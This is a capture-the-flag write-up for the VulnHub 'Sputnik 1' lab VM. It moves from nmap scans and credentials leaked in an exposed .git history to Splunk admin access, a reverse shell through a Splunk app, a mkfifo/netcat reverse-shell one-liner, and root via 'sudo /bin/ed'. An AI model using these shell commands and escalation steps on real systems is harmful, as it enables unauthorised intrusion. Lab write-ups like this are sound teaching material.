Sputnik One – Writeup

Details

This machine is https://www.vulnhub.com/entry/sputnik-1,301/

Recon Phase

First the machine is located

root@kali:~# nmap -sn -T4 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00040s latency).
MAC  Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00017s latency).
MAC Address: 08:00:27:31:E5:FF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00015s latency).
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.80 seconds

With the taget located, next up was service discovery

root@kali:~# nmap -sV -p- -T4 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00017s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE         VERSION
8089/tcp  open  ssl/http        Splunkd httpd
8191/tcp  open  limnerpressure?
55555/tcp open  http            Apache httpd 2.4.29 ((Ubuntu))
61337/tcp open  http            Splunkd httpd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.70%I=7%D=5/18%Time=5CE07322%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.58 seconds

From this I decided to run some scripts for further details

root@kali:~# nmap -sVC -p- -T4 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00013s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE         VERSION
8089/tcp  open  ssl/http        Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-03-29T11:03:21
|_Not valid after:  2022-03-28T11:03:21
8191/tcp  open  limnerpressure?
| fingerprint-strings:
|   FourOhFourRequest, GetRequest:
|     HTTP/1.0 200 OK
|     Connection: close
|     Content-Type: text/plain
|     Content-Length: 85
|_    looks like you are trying to access MongoDB over HTTP on the native driver port.
55555/tcp open  http            Apache httpd 2.4.29 ((Ubuntu))
| http-git:
|   192.168.56.102:55555/.git/
|     Git repository found!
|_    Repository description: Unnamed repository; edit this file 'description' to name the...
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Flappy Bird Game
61337/tcp open  http            Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://192.168.56.102:61337/en-US/account/login?return_to=%2Fen-US%2F
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8191-TCP:V=7.70%I=7%D=5/18%Time=5CE07A57%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,A9,"HTTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-
SF:Type:\x20text/plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like
SF:\x20you\x20are\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20
SF:on\x20the\x20native\x20driver\x20port\.\r\n")%r(FourOhFourRequest,A9,"H
SF:TTP/1\.0\x20200\x20OK\r\nConnection:\x20close\r\nContent-Type:\x20text/
SF:plain\r\nContent-Length:\x2085\r\n\r\nIt\x20looks\x20like\x20you\x20are
SF:\x20trying\x20to\x20access\x20MongoDB\x20over\x20HTTP\x20on\x20the\x20n
SF:ative\x20driver\x20port\.\r\n");
MAC Address: 08:00:27:D8:0B:51 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.24 seconds

Shell Hunting

I started by going to the web server on http://192.168.56.102:55555/

Screenshot 1

Nmap scan had revealed a .git folder, so I took a look there http://192.168.56.102:55555/.git

Screenshot 2

I dug into it a bit to see if there is a github repo end up in http://192.168.56.102:55555/.git/logs/HEAD

Screenshot 3

So there is a github repo at https://github.com/ameerpornillos/flappy.git

root@kali:~# git clone https://github.com/ameerpornillos/flappy.git
Cloning into 'flappy'...
remote: Enumerating objects: 32, done.
remote: Counting objects: 100% (32/32), done.
remote: Compressing objects: 100% (31/31), done.
remote: Total 65 (delta 11), reused 0 (delta 0), pack-reused 33
Unpacking objects: 100% (65/65), done.

A quick look at the files didn't give anything up, but it's a git repo so there's a whole history to check

root@kali:~# git log --raw
[SNIP]
commit 07fda135aae22fa7869b3de9e450ff7cacfbc717
Author: Ameer Pornillos <44928938+ameerpornillos@users.noreply.github.com>
Date:   Fri Mar 29 20:27:01 2019 +0800
    Commit new file
:000000 100644 0000000 f438519 A        secret
[SNIP]

So lets look at that commit

root@kali:~# git checkout 07fda135aae22fa7869b3de9
HEAD is now at 07fda13 Commit new file

And dig into it

root@kali:~# ls -la
drwxr-xr-x 3 root root  4096 May 18 23:47 .
drwxr-xr-x 3 root root  4096 May 18 22:57 ..
drwxr-xr-x 8 root root  4096 May 18 23:47 .git
-rw-r--r-- 1 root root   378 May 18 22:58 .gitattributes
-rw-r--r-- 1 root root   649 May 18 22:58 .gitignore
-rw-r--r-- 1 root root  7834 May 18 23:47 index.html
-rw-r--r-- 1 root root    26 May 18 23:47 README.md
-rw-r--r-- 1 root root  1538 May 18 23:47 secret
-rw-r--r-- 1 root root 11316 May 18 22:58 sheet.png
-rw-r--r-- 1 root root  5524 May 18 22:58 sprite.js

Checkout the file

root@kali:~# file secret
secret: ASCII text

Interesting

root@kali:~# cat secret
sputnik:ameer_says_thank_you_and_good_job

That looked like creds, so I dug into the web servers looking for login pages, when I got to http://192.168.56.102:61337

Screenshot 4

So I tried the creds here

Screenshot 5

I was now the splunk admin and googled for a way of getting a shell out of this, which led to https://github.com/TBGSecurity/splunk_shells so I followed the instructions

Screenshot 6

Screenshot 7

Then updated the apps permissions changing it to "All Apps"

Screenshot 8

So I setup my listener

root@kali:~# nc -nlvp 4444

And the search I needed to trigger the shell was

| revshell std 192.168.56.101 4444

On the page http://192.168.56.102:61337/en-US/app/search/search

Screenshot 9

After submitting the search

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 45952

A shell connected

Root Time

So I tested the shell

id
uid=1001(splunk) gid=1001(splunk) groups=1001(splunk)

My normal shell upgrade didn't work, and the shell felt weird, so I tested something

"
/bin/sh: 2: Syntax error: Unterminated quoted string

It seemed to be not a full shell, instead executing each command in a /bin/sh call. So I used it to spawn another shell

root@kali:~# nc -nlvp 6666

Then on the current rev shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 6666 >/tmp/f

And in my listener

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 46524
/bin/sh: 0: can't access tty; job control turned off
$

This looked better

$ python -c "import pty;pty.spawn('/bin/bash')"
splunk@sputnik:/$

This time it worked, so time to dig

splunk@sputnik:/$ sudo -l
[sudo] password for splunk:

It wanted a password so I tried

ameer_says_thank_you_and_good_job

Which gave

Matching Defaults entries for splunk on sputnik:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User splunk may run the following commands on sputnik:
    (root) /bin/ed

I can run /bin/ed as root, and ed can spawn shells, so this should be easy

splunk@sputnik:/$ sudo /bin/ed

Inside ed

!/bin/sh
#

A new shell popped

# id
uid=0(root) gid=0(root) groups=0(root)

Rooted, flag time

# cd /root
# ls -la
drwx------  4 root root 4096 Mar 29 11:50 .
drwxr-xr-x 23 root root 4096 Mar 29 10:13 ..
-rw-r--r--  1 root root 3106 Apr  9  2018 .bashrc
-r--------  1 root root 1686 Mar 29 11:49 flag.txt
drwxr-xr-x  3 root root 4096 Mar 29 10:59 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Mar 29 10:19 .ssh
# cat flag.txt
 _________________________________________
/ Congratulations!                        \
|                                         |
| You did it!                             |
|                                         |
| Thank you for trying out this challenge |
| and hope that you learn a thing or two. |
|                                         |
| Check the flag below.                   |
|                                         |
| flag_is{w1th_gr34t_p0w3r_c0m35_w1th_gr3 |
| 4t_r3sp0ns1b1l1ty}                      |
|                                         |
| Hope you enjoy solving this challenge.  |
| :D                                      |
|                                         |
\ - ameer (from hackstreetboys)           /
 -----------------------------------------
      \                    / \  //\
       \    |\___/|      /   \//  \\
            /0  0  \__  /    //  | \ \
           /     /  \/_/    //   |  \  \
           @_^_@'/   \/_   //    |   \   \
           //_^_/     \/_ //     |    \    \
        ( //) |        \///      |     \     \
       ( / /) _|_ /   )  //       |      \     _\
    ( // /) '/,_ _ _/  ( ; -.    |    _ _\.-~        .-~~~^-.
  (( / / )) ,-{        _      `-.|.-~-.           .~         `.
 (( // / ))  '/\      /                 ~-. _ .-~      .-~^-.  \
 (( /// ))      `.   {            }                   /      \  \
  (( / ))     .----~-.\        \-'                 .~         \  `. \^-.
             ///.----..>        \             _ -~             `.  ^-`  ^-_
               ///-._ _ _ _ _ _ _}^ - - - - ~                     ~-- ,.-~
                                                                  /.-~

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.